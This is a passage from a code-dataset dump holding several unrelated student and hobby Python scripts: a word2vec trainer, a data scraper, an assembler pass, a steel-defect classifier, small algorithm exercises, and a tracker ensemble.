\n self.embeddings = nn.Embedding(vocab_size, embedding_dim) # Embedding layer\n self.linear1 = nn.Linear(context_size * embedding_dim, 1024) # 1 hidden layer\n self.linear2 = nn.Linear(1024, vocab_size) # output layer Cbow\n\n def forward(self, inputs):\n embeds = self.embeddings(inputs).view(len(inputs), -1)\n out = F.relu(self.linear1(embeds))\n out = self.linear2(out)\n log_probs = F.log_softmax(out, dim=1)\n return (log_probs)\n\ndef run_code_for_training(net, epochs):\n loss_tally = []\n net = net.to(device)\n criterion = torch.nn.NLLLoss()\n optimizer = torch.optim.Adam(net.parameters(), lr=1e-4)\n start_time = time.perf_counter()\n for epoch in range(epochs):\n running_loss = 0.0\n for i, data in enumerate(train_data_loader):\n inputs, labels = data\n inputs = inputs.to(device)\n labels = labels.to(device)\n optimizer.zero_grad()\n outputs = net(inputs)\n loss = criterion(outputs, torch.max(labels, 1)[1])\n loss.backward()\n optimizer.step()\n running_loss += loss.item()\n if (i + 1) % 500 == 0:\n current_time = time.perf_counter()\n elapsed_time = current_time - start_time\n print(\"\\n[epoch:%d, batch:%5d, elapsed_time=%5d secs] loss: %.3f\" %\n (epoch + 1, i + 1, elapsed_time, running_loss / float(500)))\n loss_tally.append(running_loss / float(500))\n running_loss = 0.0\n torch.save(net.state_dict(), 'net_word2vec.pth') #origin net1\n return loss_tally\n\n\nif __name__ == '__main__':\n print(torch.__version__)\n print(torch.cuda.is_available())\n kmer_number = 5\n data = read_input()\n cut = Separate(kmer_number)\n dicts, inverse_vocab, vocab_size = cut.build_dict()\n context_length = 8\n test = def_context(data, context_length)\n context, label = test.extract_word()\n print(len(context))\n 
print(\"Data size\", len(label))\n\n train_dataset = dataloader(dicts, context, label, vocab_size)\n train_data_loader = torch.utils.data.DataLoader(dataset = train_dataset,\n batch_size=500,\n shuffle=True,\n num_workers=0)\n\n model_1 = Word2Vec(vocab_size, 768, 2*context_length) # model (how many words, embedding size, window size)\n loss_1 = run_code_for_training(model_1, 10) # training\n\n","repo_name":"lu876/BERT-methylation","sub_path":"word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":8134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3393360080","text":"import urllib.request as request\nimport json\nsrc=\"https://padax.github.io/taipei-day-trip-resources/taipei-attractions-assignment.json\"\nwith request.urlopen(src) as response:\n data=json.load(response)\nclist=data[\"result\"][\"results\"]\nwith open (\"data.csv\",\"w\",encoding=\"utf-8\")as file:\n for att in clist:\n attfile=att[\"file\"]\n attfile_split=attfile.split(\"https\")\n addr=att[\"address\"][5:8]\n attfile1=attfile_split\n file.write(att[\"stitle\"]+\",\"+addr+\",\"+att[\"longitude\"]+\",\"+att[\"latitude\"]+\",\"+\"https\"+attfile1[1]+\"\\n\")\n \n ","repo_name":"pingdori/wehelp-assignments","sub_path":"week3/week-3.py","file_name":"week-3.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"35882789945","text":"\nclass literal:\n def __init__(self,lit,address):\n self.lit=lit\n self.address=address\n self.used=False\n\nclass symbol:\n def __init__(self,sym,address):\n self.sym=sym\n self.address=address\n\nclass instruction:\n def __init__(self,name,type,machinecode,weight):\n self.name=name\n self.weight=weight\n self.machineCode=machinecode\n self.type=type\n\nclass inputInstruction(instruction):\n register=\"\"\n memory=\"\"\n locationCounter=0\n optab = open(\"optab.txt\", 'r')\n global instructionList\n def __init__(self,name,register,memory,locationCounter):\n self.name=name\n self.register=register\n self.memory=memory\n self.locationCounter=locationCounter\n\n #instruction parameters\n for _instruction in instructionList:\n if _instruction.name==self.name:\n self.type=_instruction.type\n self.weight=_instruction.weight\n self.machineCode=_instruction.machineCode\n\n\ndef loadTableOptab(instructionList):\n optabInstructionList=[]\n for _instruction in instructionList:\n myInstr=instruction(_instruction[0],_instruction[1],_instruction[2][0],_instruction[2][1])\n optabInstructionList.append(myInstr)\n return optabInstructionList\n\ndef parseInstructions(optab): #optab in readbale form\n instructionList=[]\n for line in optab:\n instruction=line.split()\n if len(instruction)>2:\n instruction[2]=instruction[2].strip('(')\n instruction[2] = instruction[2].strip(')')\n instruction[2]=instruction[2].split(',')\n instructionList.append(instruction)\n return (instructionList)\n\ndef getIndexOfOpcode(ele): #index of opcode from instruction\n global instructionList\n for _instruction in instructionList:\n for i in range(len(ele)):\n if ele[i]==_instruction.name:\n return i\n return -1\n\ndef getInstructionType(opcode):\n global instructionList\n for _instruction in instructionList:\n if _instruction.name==opcode:\n return _instruction.type\n return \"\"\n\ndef getRegister(ele,index):\n type=getInstructionType(ele[index])\n\n if type==\"IS\":\n return ele[1]\n return \"\"\n\ndef getMemory(ele,index):\n 
type=getInstructionType(ele[index])\n if type==\"IS\":\n return ele[2]\n elif type==\"AD\":\n if ele[index]==\"LTORG\":\n return \"\"\n return ele[index+1]\n\n\n\ndef loadTableInput(inputInstructionsTable):\n inputInstructionClass=[]\n for ele in inputInstructionsTable:\n name=\"\"\n register=\"\"\n memory=\"\"\n index=getIndexOfOpcode(ele)\n name=ele[index]\n register=getRegister(ele,index)\n memory=getMemory(ele,index)\n\ndef getWeight(opcode):\n global instructionList\n\n if opcode==\"END\":\n return '1'\n for ele in instructionList:\n if ele.name==opcode:\n return ele.weight\n\ndef classUp(inputInstructionsTable):\n global locationCounter\n global literalTable\n global symbolTable\n\n increment=0\n inputInstructionClassList=[]\n currentLiterals=[] #only literal values\n previnst=''\n\n for row in inputInstructionsTable:\n opcode=getIndexOfOpcode(row)\n opcode=row[opcode]\n type=getInstructionType(opcode)\n\n if type=='IS':\n increment+=1\n try:\n register=row[1]\n except:\n register=\"\"\n\n try:\n memory=row[2]\n except:\n memory=\"\"\n\n try:\n if memory[0][0]=='=':\n currentLiterals.append(memory[0])\n except:\n pass\n\n elif type=='AD':\n if opcode=='LTORG' or opcode=='END':\n #push literals\n for lit in currentLiterals:\n literalTable.append(literal(lit,locationCounter))\n locationCounter+=1\n currentLiterals=[]\n register=\"\"\n try:\n memory=row[1]\n except:\n memory=\"\"\n\n elif type=='DL':\n if opcode=='DC':\n symbolTable.append(symbol(row[0],locationCounter))\n locationCounter+=1\n elif opcode=='DS':\n symbolTable.append(symbol(row[0], locationCounter))\n locationCounter+=int(row[2][0])\n register=row[0]\n memory=row[2]\n\n if opcode=='START':\n inputInstructionClassList.append(inputInstruction(opcode, register.strip(','), memory, locationCounter))\n locationCounter=int(memory)\n else:\n inputInstructionClassList.append(inputInstruction(opcode,register.strip(','),memory,locationCounter))\n locationCounter+=increment\n increment=0\n\n return inputInstructionClassList\n\ndef getRegisterindex(reg):\n global registerList\n #print(\"reglist=\",reg)\n for i in range(len(registerList)):\n if reg==registerList[i]:\n return i+1\n return 0\n\ndef getMemoryType(instruction):\n memory=instruction.memory\n if len(memory)==0:\n return ''\n memory=memory[0]\n if('=' in memory):\n return 'L'\n elif instruction.type=='DL' or memory.isdigit():\n return 'C'\n elif len(memory)!=0:\n return 'S'\n\ndef fourthCol(instruction,memorytype):\n global literalTable\n global symbolTable\n if memorytype=='C':\n temp= instruction.memory#[0].strip('(')\n if type(temp) is not str:\n temp=temp[0].strip('(')\n temp=temp.strip(')')\n temp.strip(')')\n return temp\n if memorytype=='L':\n #print(\"memory= \", instruction.memory[0])\n index=0\n for lit in literalTable:\n print(\"lit.lit= {} inst.mem= {}\".format(lit.lit,instruction.memory[0]))\n if lit.lit==instruction.memory[0] and lit.used==False:\n\n lit.used=True\n return index+1\n else:\n index+=1\n return -9\n if memorytype=='S':\n index=0\n for symbol in symbolTable:\n if symbol.sym==instruction.memory[0]:\n return index+1\n else:\n index+=1\n\ndef writeToFile(file):\n global inputInstructionsTable\n global instructionList\n global symbolTable\n global literalTable\n global registerList\n\n file.write(\"\\n\")\n file.write(\"intermediate code \\n\")\n for _instruction in inputInstructionsTable:\n insType=_instruction.type\n insMXCode=_instruction.machineCode\n insRegisterIndex=getRegisterindex(_instruction.register)\n memoryType = 
getMemoryType(_instruction)\n insFourth=fourthCol(_instruction, memoryType)\n\n file.write('('+insType+','+insMXCode+')') #6\n if(insRegisterIndex>0):\n file.write('\\t('+str(insRegisterIndex)+')\\t') #11\n else:\n file.write(' ')\n\n if len(memoryType)!=0:\n file.write('(' + memoryType + ',' + str(insFourth) + ')') #5\n else:\n file.write(\" \")\n\n file.write('\\t\\t'+str(_instruction.locationCounter))\n\n file.write('\\n')\n\n file.write(\"\\n\\n\\n\")\n file.write(\"Symbol Table\\n\")\n index=1\n for symbol in symbolTable:\n file.write('{}\\t{}\\t{}'.format(index,symbol.sym,symbol.address))\n file.write('\\n')\n index+=1\n\n file.write(\"\\n\\n\\n\")\n file.write(\"Literal Table\\n\")\n index=1\n for literal in literalTable:\n file.write('{}\\t{}\\t{}'.format(index,literal.lit,literal.address))\n file.write('\\n')\n index+=1\n\n\nlocationCounter=0\nliteralTable=[]\nsymbolTable=[]\n\noptab=open(\"optab.txt\",'r')\nip=open(\"code1.txt\",'r')\n\nregisterList=['AREG','BREG','CREG','DREG']\n\ninstructionList=loadTableOptab(parseInstructions(optab)) #array of classes of optab\ninputInstructionsTable=parseInstructions(ip) #array of instructions of input code\ninputInstructionsTable=classUp(inputInstructionsTable)\n#for ele in inputInstructionsTable:\n # print(ele.type,ele.name,ele.register,ele.memory,ele.locationCounter)\n\nfor ele in inputInstructionsTable:\n print(ele.type,ele.name,ele.register,ele.memory,end=\"\\t\\t\\t\")\n #if(ele.type!=\"AD\"):\n print(ele.locationCounter,ele.weight,end=\"\")\n print()\n\n\nprint(\"literals: \")\nfor ele in literalTable:\n print(ele.lit,ele.address)\n\n\nprint(\"------------\")\nprint(\"symbol table: \")\nfor ele in symbolTable:\n print(ele.sym,ele.address)\n\nprint(\"------\")\ncodeop=open(\"codeop.txt\",'w')\nwriteToFile(codeop)\n","repo_name":"anonymous-baaka/System-Software-lab","sub_path":"expt2/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":8627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72956417655","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\nimport numpy as np\nimport pandas as pd\nimport os\n\nfrom timeit import default_timer as timer\nimport cv2\nimport matplotlib.pyplot as plt\n\nfrom torch.utils.data import DataLoader, Dataset, RandomSampler, SequentialSampler\nimport torch.utils.data as data\nimport torchvision.models as models\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport torch\n\nfrom heng_s_utility_functions import *\nfrom heng_s_models_all import *\n\nPI = np.pi\nIMAGE_RGB_MEAN = [0.485, 0.456, 0.406]\nIMAGE_RGB_STD = [0.229, 0.224, 0.225]\nDEFECT_COLOR = [(0,0,0),(0,0,255),(0,255,0),(255,0,0),(0,255,255)]\n\n\n\n\nSPLIT_DIR = '../input/hengs-split'\nDATA_DIR = '../input/severstal-steel-defect-detection'\n\n\n\n\nclass Net(nn.Module):\n def load_pretrain(self, skip, is_print=True):\n conversion=copy.copy(CONVERSION)\n for i in range(0,len(conversion)-8,4):\n conversion[i] = 'block.' 
+ conversion[i][5:]\n load_pretrain(self, skip, pretrain_file=PRETRAIN_FILE, conversion=conversion, is_print=is_print)\n\n def __init__(self, num_class=4, drop_connect_rate=0.2):\n super(Net, self).__init__()\n\n e = ResNet34()\n self.block = nn.ModuleList([\n e.block0,\n e.block1,\n e.block2,\n e.block3,\n e.block4,\n ])\n e = None #dropped\n self.feature = nn.Conv2d(512,32, kernel_size=1) #dummy conv for dim reduction\n self.logit = nn.Conv2d(32,num_class, kernel_size=1)\n\n def forward(self, x):\n batch_size,C,H,W = x.shape\n\n for i in range( len(self.block)):\n x = self.block[i](x)\n #print(i, x.shape)\n\n x = F.dropout(x,0.5,training=self.training)\n x = F.adaptive_avg_pool2d(x, 1)\n x = self.feature(x)\n logit = self.logit(x)\n return logit\n\n\n\n\n# Class which is used by the infor object in __get_item__\nclass Struct(object):\n def __init__(self, is_copy=False, **kwargs):\n self.add(is_copy, **kwargs)\n\n def add(self, is_copy=False, **kwargs):\n #self.__dict__.update(kwargs)\n\n if is_copy == False:\n for key, value in kwargs.items():\n setattr(self, key, value)\n else:\n for key, value in kwargs.items():\n try:\n setattr(self, key, copy.deepcopy(value))\n #setattr(self, key, value.copy())\n except Exception:\n setattr(self, key, value)\n\n def __str__(self):\n text =''\n for k,v in self.__dict__.items():\n text += '\\t%s : %s\\n'%(k, str(v))\n return text\n\n# Creating masks\ndef run_length_decode(rle, height=256, width=1600, fill_value=1):\n mask = np.zeros((height,width), np.float32)\n if rle != '':\n mask=mask.reshape(-1)\n r = [int(r) for r in rle.split(' ')]\n r = np.array(r).reshape(-1, 2)\n for start,length in r:\n start = start-1 #???? 0 or 1 index ???\n mask[start:(start + length)] = fill_value\n mask=mask.reshape(width, height).T\n return mask\n\n# Collations\ndef null_collate(batch):\n batch_size = len(batch)\n\n input = []\n truth_mask = []\n truth_label = []\n infor = []\n for b in range(batch_size):\n input.append(batch[b][0])\n truth_mask.append(batch[b][1])\n infor.append(batch[b][2])\n\n label = (batch[b][1].reshape(4,-1).sum(1)>8).astype(np.int32)\n truth_label.append(label)\n\n\n input = np.stack(input)\n input = image_to_input(input, IMAGE_RGB_MEAN,IMAGE_RGB_STD)\n input = torch.from_numpy(input).float()\n\n truth_mask = np.stack(truth_mask)\n truth_mask = (truth_mask>0.5).astype(np.float32)\n truth_mask = torch.from_numpy(truth_mask).float()\n\n truth_label = np.array(truth_label)\n truth_label = torch.from_numpy(truth_label).float()\n\n return input, truth_mask, truth_label, infor\n\n# Metric\ndef metric_hit(logit, truth, threshold=0.5):\n batch_size,num_class, H,W = logit.shape\n\n with torch.no_grad():\n logit = logit.view(batch_size,num_class,-1)\n truth = truth.view(batch_size,num_class,-1)\n\n probability = torch.sigmoid(logit)\n p = (probability>threshold).float()\n t = (truth>0.5).float()\n\n tp = ((p + t) == 2).float() # True positives\n tn = ((p + t) == 0).float() # True negatives\n\n tp = tp.sum(dim=[0,2])\n tn = tn.sum(dim=[0,2])\n num_pos = t.sum(dim=[0,2])\n num_neg = batch_size*H*W - num_pos\n\n tp = tp.data.cpu().numpy()\n tn = tn.data.cpu().numpy().sum()\n num_pos = num_pos.data.cpu().numpy()\n num_neg = num_neg.data.cpu().numpy().sum()\n\n tp = np.nan_to_num(tp/(num_pos+1e-12),0)\n tn = np.nan_to_num(tn/(num_neg+1e-12),0)\n\n tp = list(tp)\n num_pos = list(num_pos)\n\n return tn,tp, num_neg,num_pos\n\n# Loss\ndef criterion(logit, truth, weight=None):\n batch_size,num_class, H,W = logit.shape\n logit = logit.view(batch_size,num_class)\n 
truth = truth.view(batch_size,num_class)\n assert(logit.shape==truth.shape)\n\n loss = F.binary_cross_entropy_with_logits(logit, truth, reduction='none')\n\n if weight is None:\n loss = loss.mean()\n\n else:\n pos = (truth>0.5).float()\n neg = (truth<0.5).float()\n pos_sum = pos.sum().item() + 1e-12\n neg_sum = neg.sum().item() + 1e-12\n loss = (weight[1]*pos*loss/pos_sum + weight[0]*neg*loss/neg_sum).sum()\n #raise NotImplementedError\n\n return loss\n\n# Learning Rate Adjustments\ndef adjust_learning_rate(optimizer, lr):\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\ndef get_learning_rate(optimizer):\n lr=[]\n for param_group in optimizer.param_groups:\n lr +=[ param_group['lr'] ]\n\n assert(len(lr)==1) #we support only one param_group\n lr = lr[0]\n return lr\n\n# Learning Rate Schedule\nclass NullScheduler():\n def __init__(self, lr=0.01 ):\n super(NullScheduler, self).__init__()\n self.lr = lr\n self.cycle = 0\n\n def __call__(self, time):\n return self.lr\n\n def __str__(self):\n string = 'NullScheduler\\n' + 'lr=%0.5f '%(self.lr)\n return string\n\n\n\n\nschduler = NullScheduler(lr=0.001)\nbatch_size = 4 #8\niter_accum = 8\n\n\n\n\nclass SteelDataset(Dataset):\n def __init__(self, split, csv, mode, augment=None):\n# import pdb; pdb.set_trace()\n self.split = split\n self.csv = csv\n self.mode = mode\n self.augment = augment\n\n self.uid = list(np.concatenate([np.load(SPLIT_DIR + '/%s'%f , allow_pickle=True) for f in split]))\n df = pd.concat([pd.read_csv(DATA_DIR + '/%s'%f) for f in csv])\n df.fillna('', inplace=True)\n df['Class'] = df['ImageId_ClassId'].str[-1].astype(np.int32)\n df['Label'] = (df['EncodedPixels']!='').astype(np.int32)\n df = df_loc_by_list(df, 'ImageId_ClassId', [ u.split('/')[-1] + '_%d'%c for u in self.uid for c in [1,2,3,4] ])\n self.df = df\n\n def __str__(self):\n num1 = (self.df['Class']==1).sum()\n num2 = (self.df['Class']==2).sum()\n num3 = (self.df['Class']==3).sum()\n num4 = (self.df['Class']==4).sum()\n pos1 = ((self.df['Class']==1) & (self.df['Label']==1)).sum()\n pos2 = ((self.df['Class']==2) & (self.df['Label']==1)).sum()\n pos3 = ((self.df['Class']==3) & (self.df['Label']==1)).sum()\n pos4 = ((self.df['Class']==4) & (self.df['Label']==1)).sum()\n\n length = len(self)\n num = len(self)*4\n pos = (self.df['Label']==1).sum()\n neg = num-pos\n\n #---\n\n string = ''\n string += '\\tmode = %s\\n'%self.mode\n string += '\\tsplit = %s\\n'%self.split\n string += '\\tcsv = %s\\n'%str(self.csv)\n string += '\\t\\tlen = %5d\\n'%len(self)\n if self.mode == 'train':\n string += '\\t\\tnum = %5d\\n'%num\n string += '\\t\\tneg = %5d %0.3f\\n'%(neg,neg/num)\n string += '\\t\\tpos = %5d %0.3f\\n'%(pos,pos/num)\n string += '\\t\\tpos1 = %5d %0.3f %0.3f\\n'%(pos1,pos1/length,pos1/pos)\n string += '\\t\\tpos2 = %5d %0.3f %0.3f\\n'%(pos2,pos2/length,pos2/pos)\n string += '\\t\\tpos3 = %5d %0.3f %0.3f\\n'%(pos3,pos3/length,pos3/pos)\n string += '\\t\\tpos4 = %5d %0.3f %0.3f\\n'%(pos4,pos4/length,pos4/pos)\n return string\n\n\n def __len__(self):\n return len(self.uid)\n\n\n def __getitem__(self, index):\n # print(index)\n folder, image_id = self.uid[index].split('/')\n\n rle = [\n self.df.loc[self.df['ImageId_ClassId']==image_id + '_1','EncodedPixels'].values[0],\n self.df.loc[self.df['ImageId_ClassId']==image_id + '_2','EncodedPixels'].values[0],\n self.df.loc[self.df['ImageId_ClassId']==image_id + '_3','EncodedPixels'].values[0],\n self.df.loc[self.df['ImageId_ClassId']==image_id + '_4','EncodedPixels'].values[0],\n ]\n image = 
cv2.imread(DATA_DIR + '/%s/%s'%(folder,image_id), cv2.IMREAD_COLOR)\n mask = np.array([run_length_decode(r, height=256, width=1600, fill_value=1) for r in rle])\n\n infor = Struct(\n index = index,\n folder = folder,\n image_id = image_id,\n )\n\n if self.augment is None:\n return image, mask, infor\n else:\n return self.augment(image, mask, infor)\n\n\n\n\ndef do_valid(net, valid_loader, displays=None):\n valid_num = np.zeros(6, np.float32)\n valid_loss = np.zeros(6, np.float32)\n \n for t, (input, truth_mask, truth_label, infor) in enumerate(valid_loader):\n\n #if b==5: break\n net.eval()\n input = input.cuda()\n truth_mask = truth_mask.cuda()\n truth_label = truth_label.cuda()\n\n with torch.no_grad():\n logit = net(input) #data_parallel(net, input)\n loss = criterion(logit, truth_label)\n tn,tp, num_neg,num_pos = metric_hit(logit, truth_label)\n\n\n #zz=0\n #---\n batch_size = len(infor)\n l = np.array([ loss.item(), tn,*tp])\n n = np.array([ batch_size, num_neg,*num_pos])\n valid_loss += l*n\n valid_num += n\n\n #debug-----------------------------\n if displays is not None:\n probability = torch.sigmoid(logit)\n image = input_to_image(input, IMAGE_RGB_MEAN,IMAGE_RGB_STD)\n\n probability_label = probability.data.cpu().numpy()\n truth_label = truth_label.data.cpu().numpy()\n truth_mask = truth_mask.data.cpu().numpy()\n\n for b in range(0, batch_size, 4):\n image_id = infor[b].image_id[:-4]\n result = draw_predict_result_label(image[b], truth_mask[b], truth_label[b], probability_label[b], stack='vertical')\n draw_shadow_text(result,'%05d %s.jpg'%(valid_num[0]-batch_size+b, image_id),(5,24),0.75,[255,255,255],1)\n image_show('result',result,resize=1)\n# cv2.imwrite(out_dir +'/valid/%s.png'%(image_id), result)\n# cv2.waitKey(1)\n pass\n #debug-----------------------------\n\n #print(valid_loss)\n print('\\r %8d /%8d'%(valid_num[0], len(valid_loader.dataset)),end='',flush=True)\n\n pass #-- end of one data loader --\n assert(valid_num[0] == len(valid_loader.dataset))\n valid_loss = valid_loss/valid_num\n\n return valid_loss\n\n\n\n\ndef run_train():\n batch_size = 4\n \n initial_checkpoint = '/root/share/project/kaggle/2019/steel/result1/resnet34-cls-full-foldb0-0/checkpoint/00007500_model.pth'\n \n train_dataset = SteelDataset(\n mode = 'train',\n csv = ['train.csv',],\n split = ['train_b1_11568.npy',],\n augment = train_augment,\n )\n train_loader = DataLoader(\n train_dataset,\n #sampler = BalanceClassSampler(train_dataset, 3*len(train_dataset)),\n #sampler = SequentialSampler(train_dataset),\n sampler = RandomSampler(train_dataset),\n batch_size = batch_size,\n drop_last = True,\n num_workers = 2,\n pin_memory = True,\n collate_fn = null_collate\n )\n\n valid_dataset = SteelDataset(\n mode = 'train',\n csv = ['train.csv',],\n split = ['valid_b1_1000.npy',],\n augment = valid_augment,\n )\n valid_loader = DataLoader(\n valid_dataset,\n sampler = SequentialSampler(valid_dataset),\n #sampler = RandomSampler(valid_dataset),\n batch_size = 4,\n drop_last = False,\n num_workers = 2,\n pin_memory = True,\n collate_fn = null_collate\n )\n \n assert(len(train_dataset)>=batch_size)\n \n net = Net().cuda()\n \n# if initial_checkpoint is not None:\n# state_dict = torch.load(initial_checkpoint, map_location=lambda storage, loc: storage)\n# #for k in ['logit.weight','logit.bias']: state_dict.pop(k, None)\n\n# net.load_state_dict(state_dict,strict=False)\n# else:\n# load_pretrain(net.e, skip=['logit'], is_print=False)\n \n optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad, 
net.parameters()), lr=schduler(0), momentum=0.9, weight_decay=0.0001)\n\n num_iters = 3000*1000\n iter_smooth = 50\n iter_log = 500\n iter_valid = 1500\n iter_save = [0, num_iters-1] + list(range(0, num_iters, 1500))#1*1000\n\n start_iter = 0\n start_epoch= 0\n rate = 0\n if initial_checkpoint is not None:\n initial_optimizer = initial_checkpoint.replace('_model.pth','_optimizer.pth')\n if os.path.exists(initial_optimizer):\n checkpoint = torch.load(initial_optimizer)\n start_iter = checkpoint['iter' ]\n start_epoch = checkpoint['epoch']\n #optimizer.load_state_dict(checkpoint['optimizer'])\n pass\n \n train_loss = np.zeros(20,np.float32)\n valid_loss = np.zeros(20,np.float32)\n batch_loss = np.zeros(20,np.float32)\n iter = 0\n i = 0\n \n start = timer()\n# import pdb; pdb.set_trace()\n while iter=B:\n ans = min(ans,sum-B) \n return\n for i in range(idx,N):\n if selected[i]:\n continue\n selected[i] = True\n comb(i,n-1)\n selected[i] = False\n\nT = int(input())\nfor tc in range(1,T+1):\n ans = 9999999\n N,B = list(map(int,input().split()))\n heights = list(map(int,input().split()))\n selected = [False for i in range(N)]\n for n in range(1,N+1):\n comb(0,n)\n print(f'#{tc} {ans}')","repo_name":"hyunwoojeong123/Algorithm","sub_path":"SWEA/D4_1486_HighShelves.py","file_name":"D4_1486_HighShelves.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"25570809536","text":"import torch\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom base_tracker import BaseTracker\nfrom .aaa_util import (\n FeatureExtractor,\n ShortestPathTracker,\n WAADelayed,\n AnchorDetector,\n calc_overlap,\n)\n\n\nclass AAA(BaseTracker):\n def __init__(\n self, n_experts, mode=\"SuperFast\", threshold=0.0,\n ):\n super(AAA, self).__init__(\n f\"AAA/{mode}/{threshold:.2f}\" if threshold > 0 else f\"WithoutDelay/{mode}\"\n )\n\n # The number of experts\n self.n_experts = n_experts\n\n # Anchor extractor\n self.detector = AnchorDetector(threshold=threshold)\n\n # Feature extractor\n use_cuda = torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n self.extractor = FeatureExtractor(device)\n\n # Offline tracker\n self.offline = ShortestPathTracker()\n\n # If offline tracker is reset\n self.reset_offline = True\n\n # Online learner\n self.learner = WAADelayed()\n\n def initialize(self, image_file, box):\n image = Image.open(image_file).convert(\"RGB\")\n\n # Previous boxes of experts\n self.prev_boxes = []\n\n # Extract target image\n self.target_feature = self.extractor.extract(image, [box])\n\n # Init detector with target feature\n self.detector.init(self.target_feature)\n\n # Init offline tracker with target feature\n self.offline.initialize(box, self.target_feature)\n\n # Init online learner\n self.learner.init(self.n_experts)\n\n def track(self, image_file, boxes):\n image = Image.open(image_file).convert(\"RGB\")\n\n # Save box of experts\n self.prev_boxes.append(boxes)\n\n # Extract features from boxes\n features = self.extractor.extract(image, boxes)\n\n # Detect if it is anchor frame\n detected, feature_scores = self.detector.detect(features)\n anchor = len(detected) > 0\n\n # If it is anchor frame,\n if anchor:\n # Add only boxes whose score is over than threshold to offline tracker\n self.offline.track(\n boxes, features, feature_scores\n )\n\n # Caluclate optimal path\n path = self.offline.run(detected)\n\n # Get the last box's id\n final_box_id = path[-1][1]\n\n # Change 
to ndarray\n self.prev_boxes = np.stack(self.prev_boxes)\n\n if self.reset_offline:\n # Reset offline tracker\n self.offline.initialize(boxes[final_box_id], features[final_box_id])\n\n # Get offline tracking results\n offline_results = np.array(\n [self.prev_boxes[frame, ind[1]] for frame, ind in enumerate(path)]\n )\n\n else:\n offline_results = np.array(\n [self.prev_boxes[frame, ind[1]] for frame, ind in enumerate(path[-len(self.prev_boxes):])]\n )\n\n # Calc losses of experts\n gradient_losses = self._calc_expert_losses(offline_results)\n\n # Clean previous boxes\n self.prev_boxes = []\n\n # Update weight of experts\n self.learner.update(gradient_losses)\n\n # Return last box of offline results\n predict = boxes[final_box_id]\n\n # Otherwise\n else:\n # Add all boxes to offline tracker\n self.offline.track(boxes, features, feature_scores)\n\n # No offline result here\n offline_results = None\n\n # Return box with aggrogating experts' box\n predict = random.choices(boxes, weights=self.learner.w)[0]\n\n return predict, offline_results, self.learner.w\n\n def _calc_expert_losses(self, offline_results):\n \"\"\"\n offline_results = #frames X 4\n \"\"\"\n\n expert_gradient_losses = np.zeros((self.n_experts, len(offline_results)))\n\n for i in range(self.n_experts):\n expert_results = self.prev_boxes[:, i, :]\n expert_gradient_losses[i] = 1 - calc_overlap(\n expert_results, offline_results\n )\n\n return expert_gradient_losses\n","repo_name":"songheony/A3T","sub_path":"algorithms/aaa.py","file_name":"aaa.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"22"} +{"seq_id":"26988560669","text":"import math\nimport time\n\n\nif __name__==\"__main__\":\n start = time.time()\n max = 100\n d = []\n count = 0\n for a in range(2, max + 1):\n for b in range(2, max + 1):\n n = math.pow(a, b)\n if n not in d:\n #d.append(n)\n count += 1\n print(\"numbers count = {}\".format(count))\n end = time.time()\n print(\"Completed in {0:.2}s\".format(end - start))","repo_name":"chanchs/euler","sub_path":"problems/problem-29.py","file_name":"problem-29.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12909485169","text":"\"\"\"Votre algorithme doit suggérer une liste des actions les plus rentables que nous devrions \nacheter pour maximiser le profit d'un client au bout de deux ans.\"\"\"\n\n\"\"\"Nous avons les contraintes suivantes :\n-Chaque action ne peut être achetée qu'une seule fois.\n-Nous ne pouvons pas acheter une fraction d'action.\n-Nous pouvons dépenser au maximum 500 euros par client.\n\nParce que nous voulons être aussi transparents que possible pour nos clients, nous voulons que le \nprogramme essaie toutes les différentes combinaisons d'actions qui correspondent \nà nos contraintes, et choisisse le meilleur résultat. \nLe programme doit donc lire un fichier contenant des informations sur les actions, explorer toutes \nles combinaisons possibles et afficher le meilleur investissement.\n\"\"\"\n\nimport csv\nfrom time import time\n\nMAXIMUM_EXPENDITURE = 500\n\navailable_money = MAXIMUM_EXPENDITURE\n\nactions_parameters = {} # will contain all actions and their relative information \naction_prices = [] # --> tuple? is more adapted ? 
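# A compact cross-check (a sketch under assumptions, not the implementation in
# this file) of the same exhaustive search using itertools; `actions` stands
# for a hypothetical list of (cost, benefit_in_euros) pairs built from the CSV.
from itertools import combinations

def best_combination(actions, budget=MAXIMUM_EXPENDITURE):
    best_combo, best_cost, best_benefit = [], 0, 0.0
    for r in range(len(actions) + 1):
        for combo in combinations(actions, r):   # every subset of size r
            cost = sum(c for c, _ in combo)
            benefit = sum(b for _, b in combo)
            if cost <= budget and benefit > best_benefit:
                best_combo, best_cost, best_benefit = list(combo), cost, benefit
    return best_combo, best_cost, best_benefit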
; will be used to limit purchasing\n\n# all_investment_possibilities will contain all tables corresponding to a possibility of investment\nall_investment_possibilities = []\nfirst_investment_possibility = [] # will contain a possibility of investment\nall_investment_possibilities.append(first_investment_possibility)\n\nbest_investment_actions = \"unknown\"\nbest_investment_cost = \"unknown\"\nbest_investment_benefit = \"unknown\"\n\nall_investment_possibilities_which_respect_maximum_expenditure = []\n\n\ndef getActionParametersFromACsvFile(csvFileName):\n    \"\"\"Opens a CSV file and gets parameters and prices of actions\"\"\"\n    # CSV package ; method DictReader(): this method knows that the first line is a header and\n    # saves the remaining lines as dictionaries. Each key is a column name and the\n    # value is that column's value.\n\n    with open(csvFileName) as csv_file:\n        reader = csv.DictReader(csv_file, delimiter=',')\n        for line in reader:\n            # actions_parameters filling\n            action_cost = int(line['Cout_par_action_(en_euros)'])\n            action_benefit_percent = 